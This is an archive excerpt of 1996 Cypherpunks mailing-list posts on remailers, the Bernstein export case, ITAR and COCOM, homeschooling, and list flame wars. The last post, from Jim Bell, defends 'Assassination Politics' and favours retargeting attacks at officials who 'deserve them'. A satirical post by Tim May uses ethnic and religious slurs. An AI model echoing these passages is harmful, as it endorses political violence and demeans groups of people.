Any ideas ?

  Thanks for your time.
---
John Brothers 
   Do you have a right not to be offended?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 23 Sep 1996 05:59:18 +0800
To: nobody@replay.com (Anonymous)
Subject: Re: Macintosh Mixmaster port...  Who's doing it?
In-Reply-To: <199609221731.TAA18577@basement.replay.com>
Message-ID: <199609222016.PAA00572@homeport.org>
MIME-Version: 1.0
Content-Type: text


| "Myers W. Carpenter" <bmcarpenter@trevecca.edu> wrote:
| 
| >         Does anyone have any idea who might be attempting a Macintosh
| > Mixmaster port?  I and some other people were eyeing the idea.  If you
| > know who might be doing this port I would appreciate hearing from them.
| >         Thanks.
| >                         myers
| 
| You can run mixmaster on a mac, see http://mklinux.apple.com/

No, you can run UNIX on Mac hardware, and then run Mixmaster on UNIX.
You can also get AUX and MachTen to run Linux on your Mac hardware.
Both are production systems, unlike the DR1 release of MkLinux.

MachTen  (www.tenon.com) has the clear advantage for most people of
being able to run Mac & Unix apps at the same time.

	However, there is a real need for things like Mixmaster/DOS,
the WinSock remailer, and other tools that allow the average home user
to set up a remailer without taking the several days or more to
install a new OS on their system.

	A real Mac port of Mixmaster, that integrated with Claris
EMailer and Eudora would be a huge boon to the millions of Mac users
out there.  I have no doubt that Vinnie's mac crypto conference talked
a lot about this sort of thing.

Adam
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 23 Sep 1996 20:54:52 +0800
To: cypherpunks@toad.com
Subject: Re: Mercenaries
Message-ID: <ae6b6f8f06021004fe67@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:45 AM 9/23/96, Brian Davis wrote:
>On Wed, 18 Sep 1996, Timothy C. May wrote:

>> Brian Davis, our former Prosecutor, can tell us how likely it is that any
>> person would be charged and brought to trial for being a paid mercenary for
>> some small country in the Third World. The CIA is often behind such
>> mercenaries, so national security issues could make the issue murky.
>
>Exceedingly unlikely.  A variety of practical problems.  If you came up
>to a U.S. Attorney to show him your picture on the cover of The Zaire Daily
>News as mercenary of the week and spit in his face, you'd get prosecuted.
>
>For spitting in the prosecutor's face.
>
>On a slightly more serious note:  you'd only get prosecuted in someone at
>Main Justice (i.e. in Washington) wanted you prosecuted.

This of course matches my expectation. I still think if prosecution is so
unlikely, the law ought to actually come to terms with this and remove the
"official illegality" of such things.

_Almost_ more important to me than "libertarian" ideals are "consistency"
ideals: namely, that there oughtn't to be laws which are not enforced, or
which are too expensive to enforce, or which can be selectively enforced.
And since I know that the full suite of laws, all 25,000 or 45,000 of them
(on all 27 linear feet of bookshelf space) cannot possibly be consistently
enforced, I favor a "minimalist" or "fallback" position of having
relatively few laws, covering mostly "crimes" which are more easily
detected and prosecuted (with draconian punishments).



>> But the real reason such prosecutions are rare is that the government
>> realizes how Orwellian it sounds to say:
>>
>> "You are being prosecuted because you were a mercenary for Oceania in its

I was probably overstating things to say this was "the real reason." The
real reason (or the more important reason) is that resources are finite,
and, as Brian noted, no prosecutor is much interested in someone being in
Zaire's mercenary army. It doesn't register on the public's concern meter,
and it probably doesn't get one promotions in the prosecutorial community.

But the law should still be changed to reflect this reality.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 23 Sep 1996 18:04:44 +0800
To: cypherpunks@toad.com
Subject: Public Schools
Message-ID: <ae6b72ee07021004c91c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:31 AM 9/23/96, Lucky Green wrote:
>On Sun, 22 Sep 1996, snow wrote:
>>      I would agree that parents can do as good or better at _most_ subjects
>> thru about the 3rd or 4th grade, and I do agree that most of todays schools
>> are shit, however there is one area--social skills--that homeschooling
>> simply can't compete. Children need to learn how to interact with one another
>> in groups larger than a family unit. I don't think that homeschooling can
>> accomplish this nearly as well as the public (or private) schools could.
>
>I understand that many parents that homeschool belong to organizations
>that provide for meetings twice a week in which the children so educated
>in a certain area get together.  Homeschooling does not have to stand in
>the way of a normal socialization process.

Also--and I mean this point completely seriously!--many parents are not
altogether convinced that the "public school socialization" is all that
beneficial. Do kids really _need_ to learn to wear gang colors, smoke to be
cool, get pregnant at age 14, and so on?

An awful lot of accomplished persons grew up in isolated areas, on small
farms, and were educated in very small classrooms (or at home).

I think the "social skills" Snow talks about above are actually the _worst_
part of public schools in fin-de-Siecle America. If I had a kid, I wouldn't
want him or her in the local public schools.

(And my area is more remote than over in San Jose--San Francisco, which is
even worse. And LA is even worse.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 23 Sep 1996 07:00:39 +0800
To: cypherpunks@toad.com
Subject: Spam from Timmy May (fart) and his merry band of mailbombers
Message-ID: <5saouD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Is this another one of Tim May's accounts?

]From varange@crl.com  Sun Sep 22 15:39:37 1996
]Received: by bwalk.dm.com (1.65/waf)
]	via UUCP; Sun, 22 Sep 96 15:59:10 EDT
]	for dlv
]Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
]        id AA01600 for dlv@bwalk.dm.com; Sun, 22 Sep 96 15:39:37 -0400
]Received: from crl13.crl.com by mail.crl.com with SMTP id AA02700
]  (5.65c/IDA-1.5 for <dlv@bwalk.dm.com>); Sun, 22 Sep 1996 12:40:01 -0700
]Received: by crl13.crl.com id AA05247
]  (5.65c/IDA-1.5 for dlv@bwalk.dm.com); Sun, 22 Sep 1996 12:33:43 -0700
]From: Troy Varange <varange@crl.com>
]Message-Id: <199609221933.AA05247@crl13.crl.com>
]Subject: Re: [NEWS]
]To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
]Date: Sun, 22 Sep 1996 12:33:43 -0700 (PDT)
]In-Reply-To: <XJ8guD106w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 18, 96 08:07:56 pm
]X-Mailer: ELM [version 2.4 PL23]
]Mime-Version: 1.0
]Content-Type: text/plain; charset=US-ASCII
]Content-Transfer-Encoding: 7bit
]Content-Length: 1605
]
]>
]> American Banker, 9/17/96
]>
]> CHASE TO OFFER DEALERSHIPS AUTO LOAN DECISIONS OVER INTERNET
]>
]> Chase Manhattan Corp.'s auto financing division has begun using the
]> Internet to provide dealerships with loan-approval decisions. The bank
]> is the first of eight financial institutions that have committed to
]> using the system, developed by IBM Corp. By computerizing loan
]> applications and sending data electronically, Chase officials said the
]> bank can grant approvals in as few as two minutes. Up to 50% of the
]> division's auto loans will be running through the system within the
]> next 18 months. Chase, the largest car lender not affiliated with a car
]> company, is connected to six dealerships currently using the system and
]> will establish connections to 100 dealers with the official introduction
]> in October. Other financial institutions planning to use the on-line
]> system include NationsBank Corp., G.E. Capital Auto Financial Services
]> Inc., Regions Financial Corp., and Citibank Puerto Rico. The dealer's
]> computer is connected to the Internet through the IBM Globa l Network,
]> which is also used to retrieve an encrypted report from a credit bureau.
]> The dealer's pre-established "key" decodes the report and causes the
]> screen to display one, two, or three stars -- representing poor, fair,
]> or good credit. This gives the dealer an idea of which financial
]> institutions are most likely to approve the loan.
]>
]> ---
]>
]> Dr.Dimitri Vulis KOTM
]> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
]>
]F^Ackhead.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Mon, 23 Sep 1996 09:34:15 +0800
To: "Bill Stewart" <stewarts@ix.netcom.com>
Subject: Re: Please do not post off-topic flames to the list.
Message-ID: <19960922231324890.AAA142@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


Unfortunately, you've probably all received something that started out like
this:
>> You are being gently flamed because.


Sorry about that.  I've been gone for the last few days and found out that one
of my incoming mail filters was somewhat flawed.  Instead of sending that
generic response only to the esteemed Dr. Vulis it was sending it to any
message with his address *in the header*.  It also replied to any cc:ed
addresses. Ooops...  

Also, there is no need to speculate about any ulterior motives.  It was
entirely a setup glitch.  There's an important reminder here:  don't make setup
changes at 2 am and then disappear for 4 days!


Again, sorry to the list about this.

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Mon, 23 Sep 1996 12:33:09 +0800
To: Adam Shostack <adam@homeport.org>
Subject: Re: Macintosh Mixmaster port...  Who's doing it?
Message-ID: <3.0b19.32.19960922162606.006c1644@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:16 PM 9/22/96 -0500, Adam Shostack wrote:

>	A real Mac port of Mixmaster, that integrated with Claris
>EMailer and Eudora would be a huge boon to the millions of Mac users
>out there.  I have no doubt that Vinnie's mac crypto conference talked
>a lot about this sort of thing.

Actually, the Mac crypto conference didn't spend any time at all on
Mixmaster - which is not intended as a criticism of either the conference
or of Mixmaster, but it just didn't happen. 

I gave a very short talk and said that I thought the Mac needed three apps,
for people who wanted to jump in a write something useful to the cause of
privacy on the net and didn't want to reinvent any wheels: a remailer
client with a good user interface, a Mac-native remailer, and an
implementation of DC-nets. Mixmaster would, of course, address two of those
three. Lucky tells me that there is already a Mac implementation of
DC-nets, but it doesn't seem to be very well known.

My impression of the demographics of the conference was that it was folks
who are mostly working developers who aren't necessarily up-to-the minute
on crypto and ecommerce stuff, but are interested enough to at least think
about including it in their applications.

I'm pottering around with a Java-based remailer that acts like a POP client
so it can run on a client machine, not a Unix box; but other people should
take that as a challenge to see if they can finish one before/better than
me, not a reason to avoid writing one. Hal Finney has already done some
very nice work with Java and mailing; see his home page (the address of
which I don't have immediately at hand) for more details. 

For what it's worth, I think future remailer/Mixmaster development might do
well in Java. I'm not especially sold on or trusting of the alleged
security or trustability features of Java (sorry, no offense) but I *do*
think it's a neat tool for building non-machine specific network aware
applications. Ignore the fact that people use it to build silly animations
or that downloadaded applets may or may not be secure - it's still useful
as a development tool.

--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 23 Sep 1996 21:31:11 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein hearing: The Press Release
Message-ID: <ae6b7e5e0802100478fe@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:10 AM 9/23/96, Brian Davis wrote:
...
>There isn't such a clause.  The allowed restrictions were developed in
>case law.
>
>Constitutional literalists take note:  the First Amendment says nothing
>about what the executive branch or the states can do ....

Which is why President Jefferson was able to say:

"While the Constitution says "Congress shall make no law...," I am hereby
outlawing all discussion of the following subjects:.... And I have had it
with the Catholics and Jews in this country. While Congress has no power to
make laws respecting the establishment of religion or the exercise thereof,
I am under no such restrictions. Therefore, I am ordering the immediate
arrest and summary execution of all Papists and Jews...."

Seriously, does not the Constitution and Bill of Rights define what states
may do? And Presidents? The Executive is under various restrictions, and
cannot behave unconstitutionally. After all, if Alabama, for example,
reinstituted slavery, would not the 14th Amendment trump this? If
California were to, say, ban speech critical of women's or homosexual's
rights, would not the First Amendment trump this attempt?

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sun, 22 Sep 1996 16:53:11 +0800
To: rkluge@nunic.nu.edu
Subject: Re: LACC: Re: Australia now has information police
In-Reply-To: <Pine.GSO.3.92.960921191452.15565C-100000@nunic.nu.edu>
Message-ID: <199609220643.QAA13076@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> 
> 
> Hello:
> 
> I have one short, short question regarding this item. I really
> hope that you know the anwswer and have the time to answer it.
> 
> 1- International document: any idea who else had signed it?

[re COCOM trade agreements]

All COCOM countries most likely. That said Australia does not seem to be
actively enforcing this relic of the cold war. However around 8 years
ago, I recall that the NSA found out about a telephone encrypting device
developed here in Australia, and preassured the Australian government to
forbid export of the device, under COCOM provisions until it was
weakened. At the moment it is politically untenable to enforce COCOM
export provisions over cryptographic software in this country. The COCOM
treaty is seen, quite rightly, as a U.S barrow which COCOM countries had
to sign in order to avoid U.S trade sanctions and tarrifs, but not
something that needs to be enforced for smaller concerns (arms shipments
are bigger concerns).

COCOM is being replaced with new controls, according to the PARI DAILY.
(anyone have better details?)

   PARI DAILY

   FRIDAY, APRIL 5, 1996

BULGARIA IGNORED AT POST-COCOM TALKS


            Bulgaria did not take part in the first plenary session of
            the member-countries of the Wassenaar Arrangement, also
            known as the New Forum, Foreign Ministry spokesman
            Mr.Pantelei Karasimeonov told a briefing yesterday. Of all
            the 28 participants in the session, it was only USA that
            opposed Bulgaria's participation in the arrangement, a
            control regime which is to succeed the Cold War's COCOM
            export controls of technology and equipment usable for
            military purposes, too, it was revealed at the briefing.

            Bulgaria has stated many times, and at different levels, its
            willingness to join the new control regime, the Foreign
            Ministry spokesman emphasised. In a statement, disseminated
            by BTA, Bulgarian News Agency, Foreign Ministry pointed out
            that obviously some of the participants in the Wassenaar
            Arrangement talks are still under the rather depressing
            impressions of the suitable conditions created in the
            country for wide-ranging scot-free ruin and lack of
            ownership, which apply also to the military-industrial
            complex and foreign trade in spesial-purpose production. Mr.
            Karasimeonov said that these impressions have sprung from
            the period of radical economic and political reforms in the
            country; he voiced his hopes that the founder-states of the
            Wassenaar Arrangement would soon change these views of
            theirs and would put their trust in Bulgaria's export
            control abilities.

            Trade Ministry officials said that bilateral talks are due
            to be held between Bulgaria and each of the New Forum
            member-countries, which are expected to result in Bulgaria's
            joining the arrangement. An expert group is to visit USA
            from April 29 till May 3 aiming to acquaint American high
            officials with the measures Bulgaria has taken to control
            trade in spesial-purpose production, Mr.Vladimir Velichkov,
            head of Internationally Controlled Trade Department at Trade
            Ministry, said in a recent interview for the PARI Daily. By
            June an expert group of the Wassenaar Arrangement is due to
            visit Bulgaria to lead discussions about our participation
            in the New Forum.

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sun, 22 Sep 1996 16:35:06 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: Bernstein hearing: The Press Release
In-Reply-To: <199609220525.WAA21842@mail.pacifier.com>
Message-ID: <199609220647.QAA13187@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> >There may be certain circumstances under which speech can be directly harmful.
> >Military operations and missle launch codes are things that should be kept
> >secret.  Information about high-powered weapons should be too.  If the 
> Japanese
> >had been able to get information about how to build A-bombs during WWII, major
> >cities in the U.S. probably would have been completely wiped out.  I don't 
> like
> >the idea that the government has the power to decide what's harmful and what
> >isn't, but there are beneficial uses of the provision.
> 
> The few examples that exist, as you've selected them above, seem to be 
> almost entirely based on military secrets in time of war.  It is not clear 
> whether a non-security clearance civilian is restricted in any way, nor 
> should he be.

You must remember there is a distinction to information in-confidence,
and information generated independntly. It is only the breech of confidence
that should be penalised, not the information itself.

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Mon, 23 Sep 1996 10:51:34 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein hearing: The Press Release
Message-ID: <3.0b24.32.19960922171430.00685008@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:39 PM 9/21/96 -0800, Jim Bell wrote:
>At 02:03 PM 9/18/96 -0700, John Gilmore wrote:

[snip]
>>*       Any legal framework that allows a government bureaucrat to 
>>censor speech before it happens is an unconstitutional prior restraint.  
>>The government is not allowed to set up such a drastic scheme 
>>unless they can prove that publication of such information will 
>>"surely result in direct, immediate, and irreparable damage to our 
>>Nation or its people" and that the regulation at issue is necessary 
>>to prevent this damage. 
>
>At the risk of being a devil's advocate, let me suggest that you are 
>conceding too much even with the preceding paragraph.  The 1st amendment 
>says nothing about preventing speech  which (even admittedly) would result 
>in "direct, immediate, and irreparable damage to our nation or its people."
[snip]

Jim, that's a quote of Potter Stewart from the Pentagon Papers case, if I'm
not mistaken.  It's not written in the Constitution, but Supreme Court
precedent is the next best thing as far as con law goes.

>The way you've written the paragraph I've quoted above, it appears that you 
>are somehow acknowleding that there  are certain circumstances where certain 
>types of speech are controllable because they are "harmful," but you fail to 
>explain how even this constitutional restiction is tolerable.    Frankly, I 
>don't see it!  What you need to do is to be far more specific about such 
>speech and exactly where it can be controlled.

What you need to do is look at the case law :)

The government can restrict speech in time, place or manner, according to
the courts.  Restricting content is more difficult, and places a much
heavier burden on the gov.

To expect people writing about and arguing the case to completely ignore
the existing case law is foolish, IMHO.

>I should point out, also, that this is the second time I've mentioned this.  
>You're doing us a disservice if you concede too much in this area.

I think that John and EFF are doing us a huge service by their involvement
in the case.

I am very optimistic about the outcome of the Bernstein case.  Judge
Patel's ruling that source code = speech really puts the debate in the
plaintiff's court, and we saw some of that in the hearing on Friday, IMHO.  

Much of the argument was about prior restraint, with the government trying
to claim that they are only trying to restrict a specific functionality of
crypto code and not the ideas behind it.  This seemed to be a fairly weak
argument to me, and the plaintiff's attorney pointed out that the ideas
embodied in the source code are what dictate the functionality.

The plaintiff's attorney (Cindy Cohn) also argued 3 lines of cases that
bear on the issue:

1) Compelled speech.

2) Anonymity.

3) Freedom of association.

Cohn also argued that the statute is vague (terms like "general principle"
and "fundamental research") and overbroad; also that the current version of
ITAR does not even meet the scrutiny of the DOJ's own OLC review of the
statute.

When the attorney for the gov tried to drift back to the issue of whether
source code is speech, Judge Patel said, "You'll get that chance again in
another court with more judges."

Near the end of the hearing, the government attorney stated that the
statute describes "what is not controlled," which elicited a pretty hearty
laugh from the spectators.  Not a real strategic admission.

The plaintiff's brief is at:

http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/Legal/960726_filin
g/motion_partsj.html

There's quite a bit of info in that same directory.



Rich


______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
U.S. State Censorship Page at - http://www.teleport.com/~richieb/state
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 23 Sep 1996 19:04:16 +0800
To: cypherpunks@toad.com
Subject: Kicking the Furriners out of our Classrooms
Message-ID: <ae6b87f709021004ba6d@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:19 AM 9/23/96, Matthew Gream wrote:
>Hi there,
>
>> An anonymous opinion from inside the Defence Dept holds that electronic
>> bits on a wire do not constitute goods, and as a result if you ship
>> electronically, you are not subject to the regulations.  If you ship a
>> CD or floppy or other physical media containing software, you violate the
>> regulations.
>
>Watch out for those anonymous opinions; I received exactly the opposite
>opinion when I spoke to the Defence Signals Directorate about the issue
>(back in 1994) -- after specifically asking about a few hypothetical
>cases. Of course, either opinion may be correct, which is the real
>problem!

Cindy Cohn made the excellent point at the Bernstein hearing that the ITARS
are so vague and overbroad that a professor cannot be sure if his lecture
is violating the law because foreigners are in the audience (a la the
Junger case). As she notes, nearly all college and postgraduate classes are
heavily populated by non-U.S. citizens, and the ITARs specifically make
illegal the propagation of certain items to non-U.S. citizens.

(There is no exemption in the ITARs for university professors teaching
their classes. If foreigners are in the classroom, and cryptographic or
weapons-related knowledge is imparted, an ITAR violation has probably
occurred.)

Personally, I'd relish the opportunity to say to my class:

"Now, the International Trafficking in Arms Regulations, the ITARs, make it
a felony for me to disclose certain methods or techniques to non-U.S.
citizens. Accordingly, in this class, I must insist that all non-U.S.
citizens, or suspected Israelis, ragheads, Papists, or Marxists, illegal
Mexicans, etc., leave the lecture hall immediately. All those remaining
must present at least five forms of identification, dating back at least to
1978. Foreign-looking persons should provide at least seven forms of
identification, including documentation that they are not in the U.S.
illegally. Jew-looking or Jew-sounding names will be subjected to special
scrutiny to ensure that they are not dual-citizens with the ITAR-restricted
Zionist Entity.

"Oh, and since classroom participation counts for 65% of your grade, those
I exclude under the ITAR restrictions had better score 155% on the exams I
let you into the classroom to take, else you'll flunk. Good luck, you
fucking foreigners!"


(Cindy Cohn pointed out to the court that their might also be 14th
Amendment problems with enforcement of the ITARs with regard to teaching in
universities.)

--Tim May



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 23 Sep 1996 11:13:53 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: Macintosh Mixmaster port... Who's doing it?
In-Reply-To: <3.0b19.32.19960922162606.006c1644@ricochet.net>
Message-ID: <Pine.3.89.9609221705.A20219-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain





On Sun, 22 Sep 1996, Greg Broiles wrote:
> Lucky tells me that there is already a Mac implementation of
> DC-nets, but it doesn't seem to be very well known.

There is an Apple(Local?)Talk implementation of DC nets. Somebody please 
check the Eurocrypt proceedings of the late 80's.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 23 Sep 1996 07:54:51 +0800
To: Rabid Wombat <jimbell@pacifier.com>
Subject: Re: Assassination Politics, was Kiddie porn on the Internet
Message-ID: <9609222138.AB13535@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 22 Sep 96 at 9:36, jim bell wrote:

> >Where is Jimmy Hoffa?
> 
> And it worked!

Hey Jim, makes me a bit nervous when you talk that tripe.  Unions were
using guns and they still do, although the hand holding it now is the
govt.

But I suppose that you were answering only on a strictly factual
basis.

Ciao

jf

P.S. send any comments to me directly, as I am not on CPunks anymore.
So many things to do, so little time... ...sigh...
Jean-Francois Avon, Montreal QC Canada
 DePompadour, Societe d'Importation Ltee
    Finest Limoges porcelain and crystal
 JFA Technologies, R&D consultant
    physicists and engineers, LabView programming
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 23 Sep 1996 11:48:47 +0800
To: cypherpunks@toad.com
Subject: Re: Timmy May's spam (Was: Re: CIA hacked)
In-Reply-To: <Z3qNuD12w165w@bwalk.dm.com>
Message-ID: <3245DFCA.6EAB@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM wrote:
> Adam Back <aba@dcs.ex.ac.uk> writes:
> > It would seem to me that the first insults were thrown by yourself,
> > and that your strange habit of bouncing all the fallout to the list 
> > is perpetuating the problem.

> > No. Let me remind you the sequence of events, in chronological 
> > order:

[some discussion deleted]

> > Also, I would point out that you yourself don't restrict yourself to
> > purely crypto discussions (aside from this latest war), you for
> > instance recently discussed driving licenses in NY.  Not that I am
> > Right - the discussion of drivers licences and other credentials is 
> > definitely crypto-relevant. The discussion, e.g., of the ethics of
> > mandatory insurance is not.

[more discussion deleted]

I just want to add a comment about the "ethics of mandatory insurance".
If one were to assume that the state mandating insurance, seat belts, 
and so on was motivated by genuine concern for the people, then OK (if 
that's what you want to think).  OTOH, since the true motivations are 
not public knowledge (for the average person), and since some of these 
are things for which the police can check you out and inspect you more 
closely, they might be relevant after all, or at least as relevant as 
some of the other topics.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@infonex.com>
Date: Mon, 23 Sep 1996 12:00:38 +0800
To: Dale Thorn <whgiii@amaranth.com>
Subject: Re: Snake-Oil FAQ
In-Reply-To: <199609220854.DAA27487@mailhub.amaranth.com>
Message-ID: <v03007809ae6b912cca39@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:44 AM -0700 9/22/96, Dale Thorn wrote:
<SNIP>
>The basic outline for any products included (and don't forget, just
>getting included is some sort of endorsement, if you know what I mean)
>could be a feature/bug listing, using common crypto terminology, and
>could be followed by side-by-side argument paragraphs from the author
>and from a reputable review panel.
>
>The usefulness of the list would probably depend on:
>1. The participation of all those names people like to name-drop on this
>   forum.
>2. And/or the quality of the list itself if done without (1.) above.
>   In this latter case, it could still be useful, but the variances in
>   evaluation owing to personal bias would be difficult to overcome.

I like your suggestion for layout, and agree with your comments.
It is my hope that "name" people will contact me. Once the site is ready, I
will
be sending out invitations to those who have not already contacted me. I am
looking for a group of 10 or less people. Any other suggestions, comments?

	-Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 23 Sep 1996 11:49:20 +0800
To: hallam@vesuvius.ai.mit.edu
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
Message-ID: <199609230102.SAA01161@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:38 PM 9/22/96 -0400, hallam@vesuvius.ai.mit.edu wrote:
>
>I agree with Bill, AP sounds like a very good club for the Exon types
>to beat us with. 

But they're not doing it.  They know about it, but they're NOT using it.  
This should tell you something.    This really is no surprise to me; before 
I started publicizing AP, I tried to carefully consider whether letting the 
cat out of the bag was going to assist the government in stopping it.  My 
conclusion was that they didn't stand a chance.  If anything, they're afraid 
of publicizing the idea, because their opposition to it can look only 
self-serving.

>Jim's latest comments sounded no different to me than the mealy mouthed
>"understanding" messages that Sinn Fein publish about the IRA. Given
>the opportunity to condem any attack on the President under AP rules
>we get a non commital non-condemnation. Its the type of thing that Gerry
>Adams says after his men have just killed two kids with a bomb in a litterbin
>outside a MacDonalds.

Don't try to tar me with that brush.  I made it clear long ago that I'm 
opposed to truly random attacks on ordinary citizens.  However, I hasten to 
add that I'd very much prefer that these attacks be re-targeted against the 
people who deserve them.  However, I usually find that the people who make 
